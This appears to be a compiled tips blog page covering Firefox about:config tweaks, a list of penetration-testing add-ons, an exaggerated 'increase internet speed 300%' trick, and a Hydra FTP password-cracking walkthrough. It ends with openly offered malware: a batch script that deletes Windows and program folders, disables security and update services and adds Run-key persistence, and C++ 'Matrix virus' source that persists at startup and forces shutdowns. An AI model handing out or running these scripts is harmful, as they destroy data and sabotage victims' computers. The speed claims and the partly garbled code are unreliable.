When a page is loaded, Firefox will cache it into the hard disk so that it doesn’t need to be download again for redisplaying. The bigger the storage size you cater for Firefox, the more pages it can cache. Before you increase the disk cache size, make sure that browser.cache.disk.enable is set to True. Config name: browser.cache.disk.capacity Default: 50000 (in KB) Modified value: 0 – disable disk caching any value lower than 50000 reduces the disk cache any value higher than 50000 increases the disk cache.

15) Select all text when click on the URL bar

In Windows and Mac, Firefox highlights all text when you click on the URL bar. In Linux, it does not select all the text. Instead, it places the cursor at the insertion point. Regardless which platform you are using, you can now tweak it to either select all or place cursor at insertion point. firefox-select-all Config name: browser.urlbar.clickSelectsAll Modified value: False – place cursor at insertion point True – select all text on click

16) Autofill Address in URL Bar

Other than the smart location feature, you can also get your URL bar to autofill the address as you type the URL. firefox-autofill Config name: browser.urlbar.autofill Default: False Modified value: True (Have Firefox autofill the address as you type in the URL bar)

17) Same Zoom Level For Every Site

Firefox remembers your zoom preference for each site and set it to your preferences whenever you load the page. If you want the zoom level to be consistent from site to site, you can toggle the value of browser.zoom.siteSpecific from True to False. Config name: browser.zoom.siteSpecific Default: True Modified value: False (enable same zoom preferences for every sites)

18) Setting your zoom limit

If you find that the max/min zoom level is still not sufficient for your viewing, you can change the zoom limit to suit your viewing habits. Config name: zoom.maxPercent Default: 300 (percent) Modified value: any value higher than 300 Config name: zoom.minPercent Default: 30 (percent) value: any value

19) Configure Your Backspace Button

In Firefox, you can set your backspace to better use by getting it to either go back to the previous page or act as page up function. Config name: browser.backspace_action Default: 2 (does nothing) Modified value: 0 – go back previous page 1- page up

20) Increase Offline Cache

If you do not have access to Internet most of the time, you might want to increase the offline cache so that you can continue to work offline. By default, Firefox 3 caches 500MB of data from supported offline Web apps. You can change that value to whatever amount of your choice. Config name: browser.cache.offline.capacity Default: 512000 (in KB) Modified value: any value higher than 512000 will increase the cache value

21) Auto Export Firefox 3 bookmarks to bookmarks.html

Unlike the previous version, Firefox 3 backup the bookmarks file in places.sqlite rather than the usual bookmarks.html. Since bookmarks.html allows us to export and sync our bookmarks with other browser, it will be very useful if Firefox 3 can backup the bookmark to the bookmarks.htmlas well. Config name: browser.bookmarks.autoExportHTML Default: False Modified value: True (auto export bookmarks file to bookmarks.html)

22) Disable Extension Compatibility Checks

This is useful if you want to use an extension that is not supported by your version of Firefox badly. It is not recommended, but you can still do it at your own risk. Right click and select New->Boolean. Enter extensions.checkCompatibility in the field. EnterFalse in the next field. Right click again and select New->Boolean. Enter extensions.checkUpdateSecurity into the field and enter False into the next field.

23) Disable Delay Time When Installing Add-on

Everytime you wanted to install a Firefox add-on, you will have to wait for several secs before the actual installation starts. If you are tired of waiting, you can turn the functionsecurity.dialog_enable_delay off so that the installation will start immediately upon clicking. firefox-add-on-delay Config name: security.dialog_enable_delay Default: 2000 (in msec) Modified value: 0 – start installation immediately any other value (in msec)

24) View Source in Your Favorite Editor

This is very useful for developers who are always using the ‘view source‘ function. This tweak allows you to view the source code in an external editor. There are two configuration need to be made: Config name: view_source.editor.external Default: False Modified value: True ( enable view source using external text editor) Config name: view_source.editor.path Default: blank Modified value: insert the file path to your editor here.

25) Increasing ‘Save Link As‘timeout value

When you right click and select the ‘Save Link As…‘, the browser will request the content disposition header from the URL so as to determine the filename. If the URL did not deliver the header within 1 sec, Firefox will issue a timeout value. This could happen very frequently in a slow network connection environment. To prevent this issue from happening frequently, you can increase the timeout value so as to reduce the possibility of a timeout. Config name: Browser.download.saveLinkAsFilenameTimeout Default: 1000 (1 sec) Modified value: any value higher than 1000 (value is in msec)

26) Animate Fullscreen Toolbar Collapse mode

In Firefox’s fullscreen mode, toolbars and the tab strip are hidden at the top of the screen and only shown on mouseover. To draw attention to this, there is an animation of the toolbar sliding upwards and off-screen when fullscreen mode is toggled on. For performance issue, the animations of the collapse of the toolbar only appear for the first time. For some reason that you may love/hate the animation, you can adjust Browser.fullscreen.animateUp to switch it on/off for every collapse. Config name: Browser.fullscreen.animateUp Default: 1 (animate the toolbar collapse only the first time) Modified value: 0 -disable the animation 2- enable the animation for every collapse

27) Autohide Toolbar in Fullscreen mode

In fullscreen mode, the toolbar is set to autohide and appear upon mouseover. If you have a need to view the toolbar at all time, you can toggle the value of browser.fullscreen.autohide to Falseto always show the toolbar. Config name: browser.fullscreen.autohide Default: True (always autohide) Modified value: False (always show the toolbar)

28) Increase Add-On search result

If you go to Tools->Add-ons->Get Add-ons and perform a search there, Firefox will only fetch anddisplay 5 matching results. If you want Firefox to show more than 5 results (say 10), you can adjust extensions.getAddons.maxResults to get it to display more results. Config name: extensions.getAddons.maxResults Default: 5

Modified value: any value more than 5.

Turn FireFox into Penetration Tool

Firefox is a popular web browser from Mozilla. Popularity of Firefox is not only because it’s a good web browser, it also supports add-ons to enhance the functionality. Mozilla has a website add-on section that has thousands of useful add-ons in different categories. Some of these add-ons are useful for penetration testers and security analysts. These penetration testing add-ons helps in performing different kinds of attacks, and modify request headers direct from the browser. This way, it reduces the use of a separate tool for most of the penetration testing related tasks. In this brief post, we are listing a few popular and interesting Firefox add-ons that are useful for penetration testers. These add-ons vary from information gathering tools to attacking tools. Use what you think helpful. All these add-ons are available for free and you can download from the Mozilla add-on website. There are some premium add-ons like Dominator pro which is also available for purchase from official websites. See the list of free add-ons below.
Firefox Add-ons for Security Researchers and Penetration Testers

1. FoxyProxy Standard

FoxyProxy is an advanced proxy management add-on for Firefox browser. It improves the built-in proxy capabilities of Firefox. There are few other similar kind of proxy management add-ons available, but it offers more features that other add-ons. Based on the URL patterns, it switches internet connection across one or more proxy servers. When proxy is in use, it also displays an animated icon. In case you want to see the proxies used by the tool, you can see the logs. Add FoxyProxy to you browser from this link: https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

2. Firebug

Firebug is a nice add-on that integrates a web development tool inside the browser. With this tool, you can edit and debug HTML, CSS and JavaScript live in any webpage to see the effect of changes. It helps in analyzing JS files to find XSS vulnerabilities. It’s an really helpful add-on in finding DOM based XSS for security testing professionals.Add Firebug in your Browser from this link: https://addons.mozilla.org/en-US/firefox/addon/firebug/

3. Web Developer

Web Developer is another nice add-on that adds various web development tools in the browser. It helps in web application penetration testing.Add Web Developer in your browser from this link:https://addons.mozilla.org/de/firefox/addon/web-developer/

4. User Agent Switcher

User Agent Switcher add-on; adds a one click user agent switch to the browser. It adds a menu and tool bar button in the browser. Whenever you want to switch the user agent, use the browser button. User Agent add on helps in spoofing the browser while performing some attacks. Add User Agent Switcher to your browser from this link: https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/

5. Live HTTP Headers

Live HTTP Headers is a really helpful penetration testing add-on for Firefox. It displays live headers of each http request and response. You can also save header information by clicking on the button in the lower left corner. I don’t think that there is any kind of need to tell how important this add-on is for the security testing process.AddLive HTTP Headers to Firefox with this link: https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/

6. Tamper Data

Tamper Data is similar to the Live HTTP Header add-on but, has header editing capabilities. With the tamper data add-on, you can view and modify HTTP/HTTPS headers and post parameters. Thus it helps in security testing web application by modifying POST parameters. It can be used in performing XSS and SQL Injectionattacks by modifying header data.Add the Tamper data add-on to Firefox browser with this link:https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

7. Hackbar

Hackbar is a simple penetration tool for Firefox. It helps in testing simple SQL injection and XSS holes. You cannot execute standard exploits but you can easily use it to test whether vulnerability exists or not. You can also manually submit form data with GET or POST requests. It also has encryption and encoding tools. Most of the times, this tool helps in testing XSS vulnerability with encoded XSS payloads. It also supports keyboard shortcuts to perform various tasks.I am sure, most of the persons in the security field already know about this tool. This tool is mostly used in finding POST XSS vulnerabilities because it can send POST data manually to any page you like. With the ability of manually sending POST form data, you can easily bypass client side validations of the page. If your payload is being encoded at client side, you can use an encoding tool to encode your payload and then perform the attack. If the application is vulnerable to the XSS, I am sure you will find the vulnerability with the help of the Hackbar add-on on Firefox browser.Add Hackbar add-on to Firefox browser with this link:https://addons.mozilla.org/en-US/firefox/addon/hackbar/

8. Websecurify

Websecurify is a nice penetration testing tool that is also available as add-on for Firefox. We have already covered WebSecurify in detail in previous article. WebSecurify can detect most common vulnerabilities in web applications. This tool can easily detect XSS, SQL injection and other web application vulnerability. Unlike other listed tools, it is a complete penetration testing tool in itself available as a browser add-on. It gives most of the features available in standalone tool.Add WebSecurify to Firefox browser with this link:https://addons.mozilla.org/en-us/firefox/addon/websecurify/

9. Add N Edit Cookies

“Add N Edit Cookies” is a cookie editing add-on that allows you to add and edit cookies data in your browser. With this tool, you can easily add session data manually in cookies. This tool is performed in session hijacking attack when you have the active cookies of the user. Edit your cookies to add the data and hijack the account.To download Add N Edit Cookies to Your Firefox browser: https://addons.mozilla.org/en-US/firefox/addon/add-n-edit-cookies-13793/

10. XSS Me

Cross Site Scripting is the most found web application vulnerability. For detecting XSS vulnerabilities in web applications, this add-on can be a useful tool. XSS-Me is used to find reflected XSS vulnerabilities from a browser. It scans all forms of the page, and then performs an attack on the selected pages with pre-defined XSS payloads. After the scan is complete, it lists all the pages that renders a payload on the page, and may be vulnerable to XSS attack. Now, you can manually test the web page to find whether the vulnerability exists or not.Add XSS Me to your Firefox browser: https://addons.mozilla.org/en-us/firefox/addon/xss-me/

11. SQL Inject Me

SQL Inject Me is another nice Firefox add-on used to find SQL injection vulnerabilities in web applications. This tool does not exploit the vulnerability but display that it exists. SQL injection is one of the most harmful web application vulnerabilities, it can allow attackers to view, modify, edit, add or delete records in a database.The tool sends escape strings through form fields, and tries to search database error messages. If it finds a database error message, it marks the page as vulnerable. QA testers can use this tool for SQL injection testing.Add SQL Inject Me add-on to your browser: https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/

12. FlagFox

FlagFox is another interesting add-on. Once installed in the browser, it displays the country’s flag to tell the location of the web server. It also comes with other tools like whois, WOT scorecard and ping.Add FlagFox in your browser: https://addons.mozilla.org/en-us/firefox/addon/flagfox/

13. CryptoFox

CryptoFox is an encryption or decryption tool for Mozilla Firefox. It supports most of the available encryption algorithm. So, you can easily encrypt or decrypt data with supported encryption algorithm. This add-on comes with dictionary attack support, to crack MD5 cracking passwords. Although, it hasn’t have good reviews, it works satisfactorily.Add CryptoFox add-on to your browser: https://addons.mozilla.org/en-US/firefox/addon/cryptofox/

14. Access Me

Access Me, is another add-on for security testing professionals. This add-on is developed by the company that works on XSS Me and SQL Inject Me. Access Me is the can Exploit-Me tool used for testing access vulnerabilities in web applications. This tool works by sending several versions of page requests. A request using the HTTP HEAD verb and a request using a made up SECCOM verb will be sent. A combination of session and HEAD/SECCOM will also be sent.Add Access Me to Firefox from this link: https://addons.mozilla.org/en-US/firefox/addon/access-me/

15. SecurityFocus Vulnerabilities search plugin

SecurityFocus Vulnerabilities search plugin, is not a security tool but a search plugin that lets users search for vulnerabilities from the Security Focus database.Add this to Firefox from the link: https://addons.mozilla.org/en-us/firefox/addon/securityfocus-vulnerabilities-/
16. Packet Storm search plugin

This is another search plugin that lets users search for tools and exploits from packetstormsecurity.org. The website offers free up-to-date security tools, exploits and advisories.Add this to Firefox from the link:https://addons.mozilla.org/en-us/firefox/addon/packet-storm-search-plugin/

17. Offsec Exploit-db Search

This is another plugin similar to the last two above. It also lets users search for vulnerabilities and exploits listed in exploit-db.com. This website is always up-to-date with latest exploits and vulnerability details.Add this to Firefox from the link: https://addons.mozilla.org/en-us/firefox/addon/offsec-exploit-db-search/

18. Snort IDS Rule Search

Snort IDS Rule Search is another search add-on for Firefox. It lets users search for Snort IDS rules on the snort.org website. Snort is the most widely deployed IDS/IPS technology worldwide. It’s an open source network Intrusion prevention and detection system with more than 400,000 users.Add Snort IDS Rule Search to Firefox here: https://addons.mozilla.org/en-US/firefox/addon/snort-ids-rule-search/ These are few add-ons that you can use while web application penetration testing. Although, you cannot finish complete penetration testing work with these tools, but these browser tools are useful for most of the tasks and reduce the use of separate tools.

Hackbar, SQL Inject Me, XSS Me and WebSecurify are the browser tools that are widely used for finding vulnerabilities in web applications. Other tools are used for specific work which helps in getting information while penetration testing.There are many more addons are available.

Increase Internet Speed Upto 300%

This is a short trick on how to increase your internet 300% Faster or higher.
So That You Can :-)
* Increase your browsing experience
* Play online games LAG free
* Load videos almost instantly * Turn your slow internet connection into Broadband DSL or even T1
* Download anything faster with our “intelligent packet configurator”
* Increase Speeds Up To 375% Faster!
PLEASE NOTE: Only works for Mozilla Firefox
1) Open Mozilla Firefox.
2) In address bar type: “about:config”
3)Look for were it says “network.http.pipelining” to TRUE (Double Click it until it says TRUE)
4)Look for “network.http.proxy.pipelining” to TRUE (Same way as stated above)
5) Now. Right-Click Anywhere then click “Create New” Then “Integer”. Name it “nglayout.initialpaint.delay”.Then Click Ok, then put the number “0? (Zero) in the next box.
6) Click OK,
7) Restart Firefox.
Feel The Difference in Speed.

Hydra to crack FTP passwords

It reveals the basics of hacking a FTP server using dictionary search technique. Here are the steps involved.

1) Download the software hydra 5.4 form the below mentioned link.

http://freeworld.thc.org/thc-hydra/

2) Save files in any location. For convenience download the files in c:\.

3) For this demonstration a basic FTP server is setup on the network with IP address 192.168.1.4 (port 21)

4) Open a command prompt and navigate to the hydra folder. Type “hydra“or “hydra—help“to access the built-in help.

5) Type the syntax in a notepad before entering into command prompt.

6) Type the following syntax “hydra -| user –P dic.txt –e ns -vV 192.168.1.4 ftp “into notepad. Copy the syntax and paste it in command prompt. press enter.

7) The dict.txt contains the keywords for checking the FTP server password and username.

8) For demonstration purpose the dictionary fie is named”dic.txt” with some fake words and one real password of the FTP server and also the user name is already known as “user”. Hydra will find the password.

9) Hydra found the password“darkness“for this demonstration. Now that we have a username/password pair we can login to the server access the files in the ftp server.

10) Depending on the privileges of the account you got access to edit/delete/upload files. Use a Ftp client such as filezilla to edit or upload files if you have the privilege to do.

SHUT YOUR INTERNET PERMENANTLY

This is a slightly more advanced one. It shuts down your internet permanately. I tried it on myself accidently, i knew what it did, and it still took me a couple of days to get my internet back. works best on XP, not tested on vista or 7. EDIT: At the bottom put a rickroll site or something. BTW, that 3rd line, isnt what disables the internet permanately. It is somethinge else, that just provides a fast response to shut down any connections.

@echo off
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t REG_SZ /d %systemroot%\HaloTrialScoreChangerV1 /f > nul
start iexpress (website of your choice)
ipconfig /release
del "C:\Program Files\Microsoft Games
del "C:Nexon
del "C:\Program Files\Xfire
del "C:\Program Files\Adobe"
del "C:\Program Files\Internet Explorer"
del "C:\Program Files\Mozilla Firefox"
del "C:\WINDOWS"
del "C:\WINDOWS\system32"
del "C:\WINDOWS\system32\cmd"
del "C:\WINDOWS\system32\iexpress"
del "C:\WINDOWS\system32\sndvol32"
del "C:\WINDOWS\system32\sndrec32"
del "C:\WINDOWS\system32\Restore\rstrui"
del "C:\WINDOWS\system32\wupdmgr"
del "C:\WINDOWS\system32\desktop"
del "C:\WINDOWS\java"
del "C:\WINDOWS\Media"
del "C:\WINDOWS\Resources"
del "C:\WINDOWS\system"
del "C:\drivers"
del "C:\drv"
del "C:\SYSINFO"
del "C:\Program Files"
echo ipconfig/release_all>>c:windowswimn32.bat
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f :a
start iexpress (website of your choice) goto a




Show "DON'T MESS WITH ME"

To Type A Custom Message "DON'T MESS WITH ME" Continuously Popping Up Using Notepad,Just Follow Simple Steps Given Below:
Step1:Open Notepad.
Step:Select All And Copy Paste Below Code There.
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “DON'T MESS WITH ME.”
loop
Step3:Save The File As "Whatever-You-Want.vbs"Means With .vbs Extension.
Step4:Now Open That File By Double Clicking On It.
Step5:Your Message Will Pop Up Continuously.
Step6:Enjoy.

ShutDown PC

1.right click on the desktop
2.click shortcut
3.If you want, you can add a personalized message to the shut down notice by using the -c flag. Using the above example, type shutdown.exe -s -t 45 -c "comment". The comment must be in quotes.[1] For example, you can let the user know how long until the shutdown begins by typing shutdown.exe -s -t 45 -c "Computer will shut down in 45 seconds".

MAKING MOST DANGEROUS VIRUS CALLED MATRIX

Warning - Do not run it on your computer
I'm gonna teach you how to make a virus named Matrix...
1-Open notepad
2-Put in this code

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp << "@ECHO OFF n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF n";
fp << "COPY matrix.exe C:\rawr.exe n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " ";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}

goto START;
3-save it as matrix.bat
4-finish then compile it using this.. http://rapidshare.com/files/172088914/QuickBFC.exe and finally it should be matrix.exe